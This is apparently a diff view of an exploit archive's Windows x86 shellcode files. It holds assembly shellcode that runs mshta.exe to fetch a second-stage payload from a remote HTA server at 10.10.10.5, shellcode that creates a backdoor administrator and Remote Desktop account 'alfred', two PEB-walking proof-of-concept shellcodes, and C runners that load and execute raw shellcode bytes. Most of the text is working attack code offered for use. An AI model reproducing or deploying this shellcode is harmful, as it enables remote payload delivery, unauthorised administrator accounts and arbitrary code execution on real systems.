# windows/meterpreter/bind_tcp_uuid
# windows/meterpreter/reverse_hop_http
# windows/meterpreter/reverse_http
# windows/meterpreter/reverse_http_proxy_pstore
# windows/meterpreter/reverse_https
# windows/meterpreter/reverse_https_proxy
# windows/meterpreter/reverse_ipv6_tcp
# windows/meterpreter/reverse_named_pipe
# windows/meterpreter/reverse_nonx_tcp
# windows/meterpreter/reverse_ord_tcp
# windows/meterpreter/reverse_tcp
# windows/meterpreter/reverse_tcp_allports
# windows/meterpreter/reverse_tcp_dns
# windows/meterpreter/reverse_tcp_rc4
# windows/meterpreter/reverse_tcp_rc4_dns
# windows/meterpreter/reverse_tcp_uuid
# windows/meterpreter/reverse_winhttp
# windows/meterpreter/reverse_winhttps
# windows/metsvc_bind_tcp
# windows/metsvc_reverse_tcp
# windows/patchupdllinject/bind_hidden_ipknock_tcp
# windows/patchupdllinject/bind_hidden_tcp
# windows/patchupdllinject/bind_ipv6_tcp
# windows/patchupdllinject/bind_ipv6_tcp_uuid
# windows/patchupdllinject/bind_named_pipe
# windows/patchupdllinject/bind_nonx_tcp
# windows/patchupdllinject/bind_tcp
# windows/patchupdllinject/bind_tcp_rc4
# windows/patchupdllinject/bind_tcp_uuid
# windows/patchupdllinject/reverse_ipv6_tcp
# windows/patchupdllinject/reverse_nonx_tcp
# windows/patchupdllinject/reverse_ord_tcp
# windows/patchupdllinject/reverse_tcp
# windows/patchupdllinject/reverse_tcp_allports
# windows/patchupdllinject/reverse_tcp_dns
# windows/patchupdllinject/reverse_tcp_rc4
# windows/patchupdllinject/reverse_tcp_rc4_dns
# windows/patchupdllinject/reverse_tcp_uuid
# windows/patchupmeterpreter/bind_hidden_ipknock_tcp
# windows/patchupmeterpreter/bind_hidden_tcp
# windows/patchupmeterpreter/bind_ipv6_tcp
# windows/patchupmeterpreter/bind_ipv6_tcp_uuid
# windows/patchupmeterpreter/bind_named_pipe
# windows/patchupmeterpreter/bind_nonx_tcp
# windows/patchupmeterpreter/bind_tcp
# windows/patchupmeterpreter/bind_tcp_rc4
# windows/patchupmeterpreter/bind_tcp_uuid
# windows/patchupmeterpreter/reverse_ipv6_tcp
# windows/patchupmeterpreter/reverse_nonx_tcp
# windows/patchupmeterpreter/reverse_ord_tcp
# windows/patchupmeterpreter/reverse_tcp
# windows/patchupmeterpreter/reverse_tcp_allports
# "hta_server" exploit payloads setting example:
# msf6 > use exploit/windows/misc/hta_server (exploit for second stage payload delivery)
# msf6 exploit(windows/misc/hta_server) > set payload windows/exec (a payload from the previously specified list)
# msf6 exploit(windows/misc/hta_server) > set uripath 2NWyfQ9T.hta (a static value for URIPATH)
# msf6 exploit(windows/misc/hta_server) > set CMD calc.exe (command to be executed ex: calc.exe binary)
# msf6 exploit(windows/misc/hta_server) > run (second stage delivery server execution)
# Shellcode considerations:
# Function address of CreateProcessA in kernel32.dll: 0x75732082
# Function address of ExitProcess in kernel32.dll: 0x7578214f
# Size in bytes of message db parameter, 65 bytes -> 0x41 hex
# Message db contains a strings with the static path windows location of mshta.exe binary and the url obtained from hta_server exploit
# Assembly Shellcode:
global _start
section .text
_start:
jmp application
firststep:
pop edi
xor eax, eax
mov [edi+65], al ; size in bytes of message db parameter
StartUpInfoANDProcessInformation:
push eax ; hStderror null in this case
push eax ; hStdOutput, null
push eax ; hStdInput, null
xor ebx, ebx
xor ecx, ecx
add cl, 0x12 ; 18 times loop to fill both structures.
looper:
push ebx
loop looper
;mov word [esp+0x3c], 0x0101 ; dwflag arg in startupinfo
mov bx, 0x1111
sub bx, 0x1010
mov word [esp+0x3c], bx
mov byte [esp+0x10], 0x44 ; cb=0x44
lea eax, [esp+0x10] ; eax points to StartUpInfo
; eax has a pointer to StartUPinfo
; esp has a pointer to Process_Info containing null values
createprocessA:
push esp ; pointer to Process-Info
push eax ; pointer to StartUpInfo
xor ebx, ebx
push ebx ; null
push ebx ; null
push ebx ; null
inc ebx
push ebx ; bInheritHandles=true
dec ebx
push ebx ; null
push ebx ; null
push edi ; pointer to message db string
push ebx ; null
mov edx, 0x75732082 ; CreateProcessA addr in kernel32.dll
call edx
ExitProcess:
push eax ; createprocessA return in eax
mov edx, 0x7578214f ; ExitProcess addr in kernel32.dll
call edx
application:
call firststep
message db "c:\windows\system32\mshta.exe http://10.10.10.5:8080/2NWyfQ9T.hta"

84
shellcodes/windows_x86/49592.asm Normal file
View file

@ -0,0 +1,84 @@
# Exploit Title: Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
# Exploit Author: Armando Huesca Prida
# Date: 20-02-2021
#
# Tested on:
# Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)
#
# Description:
# Windows x86 Shellcode that uses CreateProcessA Windows API to add a new user to administrators and remote desktop users group. This shellcode uses JMP/CALL/POP technique and static kernel32.dll functions addresses.
# It's possible to bypass bad-chars by switching the message db string between uppercase and lowercase letters.
#
# Shellcode considerations:
# Function address of CreateProcessA in kernel32.dll: 0x77082082
# Function address of ExitProcess in kernel32.dll: 0x770d214f
# Administartor user credentials: alfred:test
# Size of message db parameter, 152 bytes -> 0x98 hex =3D 0x111111A9 - 0x11111111 (0x00 badchar avoidance) ;)
#
# Assembly shellcode:
global _start
section .text
_start:
jmp application
firststep:
pop edi
xor eax, eax
mov esi, 0x111111A9
sub esi, 0x11111111
mov [edi+esi], al ; size of message db parameter
StartUpInfoANDProcessInformation:
push eax; hStderror null in this case
push eax; hStdOutput, null
push eax; hStdInput, null
xor ebx, ebx
xor ecx, ecx
add cl, 0x12; 18 times loop to fill both structures.
looper:
push ebx
loop looper
;mov word [esp+0x3c], 0x0101; dwflag arg in startupinfo
mov bx, 0x1111
sub bx, 0x1010
mov word [esp+0x3c], bx
mov byte [esp+0x10], 0x44; cb=3D0x44
lea eax, [esp+0x10]; eax points to StartUpInfo
; eax holds a pointer to StartUPinfo
; esp holds a pointer to Process_Info filled of null values
createprocessA:
push esp; pointer to Process-Info
push eax; pointer to StartUpInfo
xor ebx, ebx
push ebx; null
push ebx; null
push ebx; null
inc ebx
push ebx; bInheritHandles=3Dtrue
dec ebx
push ebx; null
push ebx; null
push edi; pointer to message db string
push ebx; null
mov edx, 0x77082082; CreateProcessA addr in kernel32.dll
call edx
ExitProcess:
push eax; createprocessA return in eax
mov edx, 0x770d214f; ExitProcess addr in kernel32.dll
call edx
application:
call firststep
message db 'c:\windows\system32\cmd.exe /c net user alfred test /add & net localgroup ADMINISTRATORS alfred /add & net localgroup "Remote Desktop Users" alfred /add'

187
shellcodes/windows_x86/50368.c Normal file
View file

@ -0,0 +1,187 @@
; Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)
; Description:
; This is a shellcode that pop a calc.exe. The shellcode iuses
; the PEB method to locate the baseAddress of the required module and the Export Directory Table
; to locate symbols. Also the shellcode uses a hash function to gather dynamically the required
; symbols without worry about the length. Finally the shellcode pop the calc.exe using WinExec
; and exits gracefully using TerminateProcess.
; Author: h4pp1n3ss
; Date: Wed 09/22/2021
; Tested on: Microsoft Windows [Version 10.0.19042.1237]
start:
mov ebp, esp ; prologue
add esp, 0xfffff9f0 ; Add space int ESP to avoid clobbering
find_kernel32:
xor ecx, ecx ; ECX = 0
mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30])
mov esi,[esi+0x0C] ; ESI = PEB->Ldr
mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder
next_module:
mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address
mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name
mov esi, [esi] ; ESI = InInitOrder[X].flink (next)
cmp [edi+12*2], cx ; (unicode) modulename[12] == 0x00 ?
jne next_module ; No: try next module
find_function_shorten:
jmp find_function_shorten_bnc ; Short jump
find_function_ret:
pop esi ; POP the return address from the stack
mov [ebp+0x04], esi ; Save find_function address for later usage
jmp resolve_symbols_kernel32 ;
find_function_shorten_bnc:
call find_function_ret ; Relative CALL with negative offset
find_function:
pushad ; Save all registers
mov eax, [ebx+0x3c] ; Offset to PE Signature
mov edi, [ebx+eax+0x78] ; Export Table Directory RVA
add edi, ebx ; Export Table Directory VMA
mov ecx, [edi+0x18] ; NumberOfNames
mov eax, [edi+0x20] ; AddressOfNames RVA
add eax, ebx ; AddressOfNames VMA
mov [ebp-4], eax ; Save AddressOfNames VMA for later
find_function_loop:
jecxz find_function_finished ; Jump to the end if ECX is 0
dec ecx ; Decrement our names counter
mov eax, [ebp-4] ; Restore AddressOfNames VMA
mov esi, [eax+ecx*4] ; Get the RVA of the symbol name
add esi, ebx ; Set ESI to the VMA of the current symbol name
compute_hash:
xor eax, eax ; NULL EAX
cdq ; NULL EDX
cld ; Clear direction
compute_hash_again:
lodsb ; Load the next byte from esi into al
test al, al ; Check for NULL terminator
jz compute_hash_finished ; If the ZF is set, we've hit the NULL term
ror edx, 0x0d ; Rotate edx 13 bits to the right
add edx, eax ; Add the new byte to the accumulator
jmp compute_hash_again ; Next iteration
compute_hash_finished:
find_function_compare:
cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash
jnz find_function_loop ; If it doesn't match go back to find_function_loop
mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA
add edx, ebx ; AddressOfNameOrdinals VMA
mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal
mov edx, [edi+0x1c] ; AddressOfFunctions RVA
add edx, ebx ; AddressOfFunctions VMA
mov eax, [edx+4*ecx] ; Get the function RVA
add eax, ebx ; Get the function VMA
mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad
find_function_finished:
popad ; Restore registers
ret ;
resolve_symbols_kernel32:
push 0xe8afe98 ; WinExec hash
call dword ptr [ebp+0x04] ; Call find_function
mov [ebp+0x10], eax ; Save WinExec address for later usage
push 0x78b5b983 ; TerminateProcess hash
call dword ptr [ebp+0x04] ; Call find_function
mov [ebp+0x14], eax ; Save TerminateProcess address for later usage
create_calc_string:
xor eax, eax ; EAX = null
push eax ; Push null-terminated string
push dword 0x6578652e ;
push dword 0x636c6163 ;
push esp ; ESP = &(lpCmdLine)
pop ebx ; EBX save pointer to string
; UINT WinExec(
; LPCSTR lpCmdLine, -> EBX
; UINT uCmdShow -> EAX
; );
call_winexec:
xor eax, eax ; EAX = null
push eax ; uCmdShow
push ebx ; lpCmdLine
call dword ptr [ebp+0x10] ; Call WinExec
; BOOL TerminateProcess(
; HANDLE hProcess, -> 0xffffffff
; UINT uExitCode -> EAX
; );
terminate_process:
xor eax, eax ; EAX = null
push eax ; uExitCode
push 0xffffffff ; hProcess
call dword ptr [ebp+0x14] ; Call TerminateProcess
[!]===================================== POC ========================================= [!]
/*
Shellcode runner author: reenz0h (twitter: @sektor7net)
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// Our WinExec PopCalc shellcode
unsigned char payload[] =
"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x5e\x08\x8b\x7e"
"\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43"
"\x3c\x8b\x7c\x03\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b\x45\xfc\x8b"
"\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75"
"\xdf\x8b\x57\x24\x01\xda\x66\x8b\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61"
"\xc3\x68\x98\xfe\x8a\x0e\xff\x55\x04\x89\x45\x10\x68\x83\xb9\xb5\x78\xff\x55\x04\x89\x45\x14\x31\xc0"
"\x50\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x54\x5b\x31\xc0\x50\x53\xff\x55\x10\x31\xc0\x50\x6a\xff"
"\xff\x55\x14";
unsigned int payload_len = 178;
int main(void) {
void * exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
// Allocate a memory buffer for payload
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Copy payload to new buffer
RtlMoveMemory(exec_mem, payload, payload_len);
// Make new buffer as executable
rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
printf("\nHit me!\n");
printf("Shellcode Length: %d\n", strlen(payload));
getchar();
// If all good, run the payload
if ( rv != 0 ) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}

196
shellcodes/windows_x86/50369.c Normal file
View file

@ -0,0 +1,196 @@
; Name: Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
; Author: h4pp1n3ss
; Date: Wed 09/23/2021
; Tested on: Microsoft Windows [Version 10.0.19042.1237]
; Description:
; This is a shellcode that
; pop a MessageBox and show the text "Pwn3d by h4pp1n3ss". In order to accomplish this task the shellcode uses
; the PEB method to locate the baseAddress of the required module and the Export Directory Table
; to locate symbols. Also the shellcode uses a hash function to gather dynamically the required
; symbols without worry about the length.
start:
mov ebp, esp ;
add esp, 0xfffff9f0 ; Avoid NULL bytes
find_kernel32:
xor ecx, ecx ; ECX = 0
mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30])
mov esi,[esi+0x0C] ; ESI = PEB->Ldr
mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder
next_module:
mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address
mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name
mov esi, [esi] ; ESI = InInitOrder[X].flink (next)
cmp [edi+12*2], cx ; (unicode) modulename[12] == 0x00 ?
jne next_module ; No: try next module
find_function_shorten:
jmp find_function_shorten_bnc ; Short jump
find_function_ret:
pop esi ; POP the return address from the stack
mov [ebp+0x04], esi ; Save find_function address for later usage
jmp resolve_symbols_kernel32 ;
find_function_shorten_bnc:
call find_function_ret ; Relative CALL with negative offset
find_function:
pushad ; Save all registers
mov eax, [ebx+0x3c] ; Offset to PE Signature
mov edi, [ebx+eax+0x78] ; Export Table Directory RVA
add edi, ebx ; Export Table Directory VMA
mov ecx, [edi+0x18] ; NumberOfNames
mov eax, [edi+0x20] ; AddressOfNames RVA
add eax, ebx ; AddressOfNames VMA
mov [ebp-4], eax ; Save AddressOfNames VMA for later
find_function_loop:
jecxz find_function_finished ; Jump to the end if ECX is 0
dec ecx ; Decrement our names counter
mov eax, [ebp-4] ; Restore AddressOfNames VMA
mov esi, [eax+ecx*4] ; Get the RVA of the symbol name
add esi, ebx ; Set ESI to the VMA of the current symbol name
compute_hash:
xor eax, eax ; NULL EAX
cdq ; NULL EDX
cld ; Clear direction
compute_hash_again:
lodsb ; Load the next byte from esi into al
test al, al ; Check for NULL terminator
jz compute_hash_finished ; If the ZF is set, we've hit the NULL term
ror edx, 0x0d ; Rotate edx 13 bits to the right
add edx, eax ; Add the new byte to the accumulator
jmp compute_hash_again ; Next iteration
compute_hash_finished:
find_function_compare:
cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash
jnz find_function_loop ; If it doesn't match go back to find_function_loop
mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA
add edx, ebx ; AddressOfNameOrdinals VMA
mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal
mov edx, [edi+0x1c] ; AddressOfFunctions RVA
add edx, ebx ; AddressOfFunctions VMA
mov eax, [edx+4*ecx] ; Get the function RVA
add eax, ebx ; Get the function VMA
mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad
find_function_finished:
popad ; Restore registers
ret ;
resolve_symbols_kernel32:
push 0xec0e4e8e ; LoadLibraryA hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x10], eax ; Save LoadLibraryA address for later usage
push 0x78b5b983 ; TerminateProcess hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x14], eax ; Save TerminateProcess address for later usage
load_user32_lib:
xor eax, eax ; EAX = Null
mov ax, 0x6c6c;
push eax; ; Stack = "ll"
push dword 0x642e3233; ; Stack = "32.dll"
push dword 0x72657355; ; Stack = "User32.dll"
push esp ; Stack = &("User32.dll")
call dword [ebp+0x10] ; Call LoadLibraryA
resolve_symbols_user32:
mov ebx, eax ; Move the base address of user32.dll to EBX
push 0xbc4da2a8 ; MessageBoxA hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x18], eax ; Save MessageBoxA address for later usage
call_MessageBoxA:
xor eax, eax ; EAX = NULL
mov ax, 0x7373 ; "ss"
push eax ; Stack = "ss"
push dword 0x336e3170 ; Stack = "p1n3ss"
push dword 0x70346820 ; Stack = " h4pp1n3ss"
push dword 0x79622064 ; Stack = "d by h4pp1n3ss"
push dword 0x336e7750 ; Stack = "Pwn3d by h4pp1n3ss"
push esp ; Stack = &("Pwn3d by h4pp1n3ss")
mov ebx, [esp] ; EBX = &(push_inst_greetings)
xor eax, eax ; EAX = NULL
push eax ; uType
push ebx ; lpCaption
push ebx ; lpText
push eax ; hWnd
call dword [ebp+0x18] ; Call MessageBoxA
call_TerminateProcess:
xor eax, eax ; EAX = null
push eax ; uExitCode
push 0xffffffff ; hProcess
call dword [ebp+0x14] ; Call TerminateProcess
[!]===================================== POC ========================================= [!]
/*
Shellcode runner author: reenz0h (twitter: @sektor7net)
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// Our MessageBoxA shellcode
unsigned char payload[] =
"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b"
"\x76\x1c\x8b\x5e\x08\x8b\x7e\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06"
"\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43\x3c\x8b\x7c\x03"
"\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b"
"\x45\xfc\x8b\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca"
"\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75\xdf\x8b\x57\x24\x01\xda\x66\x8b"
"\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61\xc3"
"\x68\x8e\x4e\x0e\xec\xff\x55\x04\x89\x45\x10\x68\x83\xb9\xb5\x78\xff\x55"
"\x04\x89\x45\x14\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32\x2e\x64\x68\x55"
"\x73\x65\x72\x54\xff\x55\x10\x89\xc3\x68\xa8\xa2\x4d\xbc\xff\x55\x04\x89"
"\x45\x18\x31\xc0\x66\xb8\x73\x73\x50\x68\x70\x31\x6e\x33\x68\x20\x68\x34"
"\x70\x68\x64\x20\x62\x79\x68\x50\x77\x6e\x33\x54\x8b\x1c\x24\x31\xc0\x50"
"\x53\x53\x50\xff\x55\x18\x31\xc0\x50\x6a\xff\xff\x55\x14";
unsigned int payload_len = 230;
int main(void) {
void * exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
// Allocate a memory buffer for payload
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Copy payload to new buffer
RtlMoveMemory(exec_mem, payload, payload_len);
// Make new buffer as executable
rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
printf("\nHit me!\n");
printf("Shellcode Length: %d\n", strlen(payload));
getchar();
// If all good, run the payload
if ( rv != 0 ) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}